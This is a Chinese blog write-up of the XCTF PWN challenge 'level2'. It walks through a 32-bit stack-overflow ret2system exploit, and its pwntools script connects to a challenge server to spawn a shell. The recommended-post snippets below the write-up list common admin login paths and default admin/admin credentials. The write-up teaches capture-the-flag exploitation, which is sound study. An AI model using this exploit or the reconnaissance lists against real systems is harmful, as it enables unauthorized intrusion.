攻防世界xctf PWN leve2详细讲解,两个地址方法

原创 已于 2023-08-19 21:15:36 修改 · 376 阅读 · 2 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
标签
#安全 #汇编
于 2023-08-19 21:12:33 首次发布
文章描述了一种利用32位程序的漏洞进行溢出攻击的方法,通过启用NX防护后找到/bin/sh字符串和system函数,通过调整返回地址和参数实现shell命令执行。着重解释了system_addr的不同地址含义以及payload构建技巧。

看题
在这里插入图片描述
常规看下保护:
在这里插入图片描述
32位程序,启用的保护不多,启用了NX防护
IDA看下代码
在这里插入图片描述
在这里插入图片描述
可以看到有一个溢出
在这里插入图片描述
/bin/sh 字符串有,system函数也有,齐活了。溢出把返回地址改成system的地址,再加/bin/sh参数就能拿到shell了。

上代码:

from pwn import *
context.arch = 'i386'
context.log_level="debug"

#system_addr=0x08048320
system_addr=0x0804849e

bin_bash_addr=0x0804A024

#payload=b"A"*0x88+b"BBBB"+p32(system_addr)+p32(0)+p32(bin_bash_addr)
payload=b"A"*0x88+b"BBBB"+p32(system_addr)+p32(bin_bash_addr)

#p = process("./leve2")
p = remote("61.147.171.105",51122)

p.recvline()
p.sendline(payload)
p.interactive()

这里有一点要说,system_addr有两个地址,一个是0x0804849e,一个是0x08048320,0x0804849e对应的代码是call _system,而0x08048320就是system函数的地址。区别就在于一个有call,一个没有call,有call就不需要在返回地址后面再加一个栈帧(也就是system的返回地址),直接接参数,因为call会压一次栈,把下一条指令的地址(返回地址)压入栈,其实也是p32(system_addr)+p32(0)+p32(bin_bash_addr)这个结构,因为system会取前第两个栈帧的值当参数。

admin后台页面
04-12
NULL 博文链接:https://firebata.iteye.com/blog/1707069
大型门户网免费完整版 本系统后台路径: /admin/index.asp 后台用户名: admin后台密码: admin
10-07
大型门户网免费完整版 本系统后台路径: /admin/index.asp 后台用户名: admin后台密码: admin
dedeCMS后台入口安全修改
草巾冒小子的博客
01-13 2073
dedeCMS后台入口问题 以上就是关于“ dedeCMS后台入口问题 ” 的全部内容。
网站后台登录地址大全
chance2015的博客
12-25 2万+
/admin/index.asp   /admin/login.asp   /admin/admin_login.asp   /manage/index.asp   /manage/login.asp   /manage/admin_login.asp   /admin/index.aspx  /admin/login.aspx  /admin/admin_login.aspx 
后台登陆地址大全
卧龙居
05-23 8107
/admin/index.asp   /admin/login.asp   /admin/admin_login.asp   /manage/index.asp   /manage/login.asp   /manage/admin_login.asp   /admin/index.aspx  /admin/login.aspx  /admin/admin_login.aspx 
网络安全零基础入门(第四章-1)信息搜集
素笺
03-24 1126
每日一句:信息搜集的优劣决定着渗透测试切入点的广度。 本篇内容:为什么进行信息搜集      信息搜集什么      Google语法      网络空间搜索引擎 一、重要性—为啥要信息搜集 1.渗透测试 - 安全是一个水桶效应   安全的高低永远取决于最薄弱的点   注意:社会工程学的威力超乎想象 二、信息搜集的方向和手段 1.whois信息   Whois简单来说,就是一个用来查询域名是否...
五花八门的后台登录方式
weixin_33963594的博客
02-23 425
2019独角兽企业重金招聘Python工程师标准>>> ...
网站后台管理系统——登录部分
west13的专栏
11-17 1538
一、思路介绍 1.这块内容包含三个部分: 第一、数据库中存放用户登录信息。 第二、登录页面(js验证)。 第三、用户信息验证。 2.各部分功能实现方式介绍 第一、在数据库中写入默认的用户名和密码。 第二、登录页面中有两表单:用户名和密码,这部分要进行js验证,验证用户名和密码长度。 第三、编写另外一个jsp页面用于验证用户名和密码是否和数据库中的一致。 ...
VUE 通用后台管理系统
weixin_53094939的博客
12-16 1万+
用VUE框架搭建一个通用后台管理系统,组件化、模块化实现用户登陆后台管理、页面显示和跳转等功能。
超详细servlet+jdbc+html+css实现后台管理登陆
江小白的博客
05-28 732
servlet+jdbc+html+css实现后台管理登陆 本文为web入门级,先给大家看看效果图吧! 后续推出企业级网站开发教程,服务器集群,缓存策略,数据算法等文章,敬请期待。 这个简洁的界面,大家可以自己去加以修改完善。 好了,开始步入正题。 这个web工程的思路是什么呢? 登陆界面点击登陆 登陆成功,跳转到登陆成功界面 登陆失败,跳转到登陆失败界面 好了,我们的具体思路呢? ...
后台管理页面实现多用户登陆验证
Fancy5555的博客
11-27 2378
我们经常会写到一些涉及到登录功能的网站,但是经常是单用户登录,即网站只验证一次且管理用户只有一个,不需要循环验证。 今天在实现后台管理用户登录的过程中,碰到了多用户验证的问题,即多个管理员,我的描述可能不太准确。 初始我的代码是这样的 check=()=>{ for(var i=0;i<this.state.data.length;i++){ i...
asp.net在线报名系统
10-27
此在线报名系统比较详细的表达演示了如何使用js正则表达式进行客户的操作、验证,可以作为学习客户的编码的实例参考。
Vue电商后台管理系统功能展示
weixin_45065754的博客
03-13 6316
项目技术:html、css、javascript、node.js、vue、mysql 项目描述:电商后台管理系统,主要功能包括:用户账号管理、商品分类、商品信息、订单、数据统计等业务功能。采用前后端分离的开发模式,其中前端项目是基于Vue技术栈的SPA项目,通过API接连接服务器,访问mysql数据库。 成品效果展示: 一、登陆界面 二、登陆校验规则 三、登陆成功后,保存Token 四、用户管理页面 五、添加用户功能(采用正则表达式进行校验) 六、添加用户成功,弹出消息框 .
SpringBoot 集成Shiro设置后台管理登陆和会员登陆注册管理
qq_40990836的博客
08-09 1035
概述 使用Springboot 集成了 shiro。现在需要一个系统中,拥有后台管理员,和注册会员两种用户,后台管理登陆之后,需要跳转到后台管理。注册会员需要跳转到会员之前跳转到登陆过来的页面。并且两个帐号并不可以通用。 FormAuthenticationFilter 这个过滤器是我们shiro配置类中。 配置对请求路径的过滤策略。我们需要继承这个类来重写三个方法 ** * 管理员后台登陆 ...
测试后台管理系统思路和方法
beautiful_life123的博客
08-01 2万+
每个公司不管做什么业务,开发网站,app或者公众号亦或小程序,但凡涉及到用户信息或者订单信息都有对应的后台管理系统,所以每个测试人员基本上都有测试过后台管理系统的经验,但是后台管理系统测试不仅仅是基本的增删改查测试,还需要进行业务逻辑测试,还有兼容性测试,接测试和压力测试。下面是我总结的测试思路和方法,可能有很多不足之处,希望多多评论补充 第一步,分析需求文档和原型图,原型图最好看有交互效果的...
discuz管理员登录进入后台管理马上跳转到登录界面
zhjmyx的专栏
03-14 3284
discuz管理员登录进入后台管理马上跳转到登录界面 2016年10月09日 00:47:31张林blog阅读数:12987 版权声明:本文为博主原创文章,未经博主允许转载随意。 https://blog.csdn.net/kebi007/article/details/52762126 昨天尝试了一下这个discuz论坛,感觉还可以。今天刚刚用管理员账户进入后台管理,准备改一改界面熟...
10款精选的后台管理系统
m0_63026408的博客
10-12 2万+
此项目是 vue + element-ui 构建的后台管理系统,是后台项目node-elm 的管理系统,所有的数据都是从服务器实时获取的真实数据,具有真实的注册、登陆、管理数据、权限验证等功能。
vue后台管理之动态加载路由
热门推荐
余空啊的博客
08-08 4万+
在这里我们将会实现一个vue动态路由的案列,当用户登陆成功后,根据用户的角色,拿到他对应的菜单信息,并将它动态的载入到我们的路由中。 我们的通用的后台管理系统中,我们会根据权限的粗细不同,会对每个角色每个权限每个资源进行控制。同样的我们也需要实现一个这样的功能。 这篇文章我将主要讲vue端的实现,关于后台我就不会涉及,当我接触的时候我们的后台是springcloud实现。 ...
教你如何快速找到网站管理后台
不定时分享最优质的网络技术与教程,满满的干货。
09-13 1万+
大部分网站设计更多是考虑用户业务的实现,而软件开发商和网站的系统运维人员对攻击技术和网站的维护并不了解,在使用的过程中未能发现可能存在的安全漏洞。黑客一般可以较好利用这些漏洞为自己谋取利益。 接下来这篇文章,就和大家讲讲 ,一般是如何获取网站后台地址的 . 目前比较常见的 分析方法通常有以下几种
admin.php生成地址,FastAdmin隐藏后台登录入口地址的方法
weixin_42314648的博客
03-25 4419
从V1.0.0.20190930_beta版本开始,都已经默认禁用admin模块且同时自动在public目录生成随机文件.php,请通过这个随机入口登录后台。我们都知道后台www.yoursite.com/admin是我们最常用的登录入口,方便的同时也留下了隐患,如果你刚好使用了admin/123456这种账号密码的方式,会导致我们的后台完全暴露在外。因此我们强烈建议你修改后台的登录入口,达到隐藏...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值